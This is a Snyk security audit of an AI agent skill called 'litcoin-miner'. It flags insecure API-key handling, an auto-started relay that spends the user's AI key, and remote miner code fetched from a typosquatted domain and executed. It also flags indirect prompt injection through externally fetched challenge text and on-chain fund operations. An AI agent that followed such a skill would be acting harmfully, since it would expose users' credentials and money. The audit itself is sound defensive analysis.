litcoin-miner
Fail
Audited by Snyk on Mar 10, 2026
Risk Level: CRITICAL
Full Analysis
HIGH W007: Insecure credential handling detected in skill instructions.
- Insecure credential handling detected (high risk: 0.90). The prompt explicitly shows API keys (bankr_key, ai_key) being passed directly into code examples and instructs obtaining and using those keys, which encourages the agent to accept and embed secret values verbatim in outputs.
CRITICAL E006: Malicious code pattern detected in skill scripts.
- Malicious code pattern detected (high risk: 0.90). This skill contains multiple high-risk patterns:
  - it auto‑starts a relay that uses the user's AI API key to serve third‑party inference (risking credential misuse, unexpected charges, and data leakage);
  - instructs embedding a Bankr API key in MCP/env (exposing a secret that can be used to sign on‑chain claims/transactions by external processes/agents);
  - sends user-submitted research/code to a coordinator that re‑runs submissions (remote code execution and IP/data exfiltration risk);
  - encourages downloading and executing a remotely hosted miner script (supply‑chain risk, typosquatted domain litcoiin.xyz);
  - and relies on UUPS upgradeable contracts (allowing later malicious upgrade/rug‑pull).
  Together these behaviors strongly suggest deliberate backdoor/abuse-capable design rather than an innocuous library.
MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).
- Third-party content exposure detected (high risk: 0.90). The skill explicitly fetches public mining and benchmark challenges from the coordinator API (e.g., GET /v1/challenge and benchmark endpoints at https://api.litcoiin.xyz referenced in SKILL.md), and the agent is required to read and solve those externally‑provided prose documents as part of mining/research, so untrusted third‑party content could steer its actions.
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 0.90). The skill explicitly instructs fetching and executing remote code at runtime (curl -O https://litcoiin.xyz/litcoin_miner.py then python litcoin_miner.py) and also relies on runtime-installed packages/commands that execute remote code (pip install litcoin -> https://pypi.org/project/litcoin/ and npx litcoin-mcp -> https://www.npmjs.com/package/litcoin-mcp), so these external URLs/packages can directly execute code and influence agent behavior.
MEDIUM W009: Direct money access capability detected (payment gateways, crypto, banking).
- Direct money access detected (high risk: 1.00). The skill is explicitly a crypto/DeFi SDK that performs on-chain financial operations. It requires a Bankr API key (wallet proof) and ETH for gas and exposes methods that send transactions and manage funds: agent.claim() (claim rewards on-chain), agent.stake()/unstake()/upgrade_tier(), agent.open_vault(), agent.mint_litcredit(...), agent.repay_debt(...), agent.add_collateral(...)/withdraw_collateral(...)/close_vault(), agent.deposit_escrow(amount), agent.join_guild(guild_id, amount), agent.faucet(), and agent.balance() among others. The skill names chain (Base), token contract, and gas requirements, and the coordinator notes that Bankr API key resolves to a wallet for authorization. These are specific, purpose-built financial actions (crypto wallet interactions, minting, staking, vault management, depositing funds), not generic tooling — therefore it grants direct financial execution authority.
Audit Metadata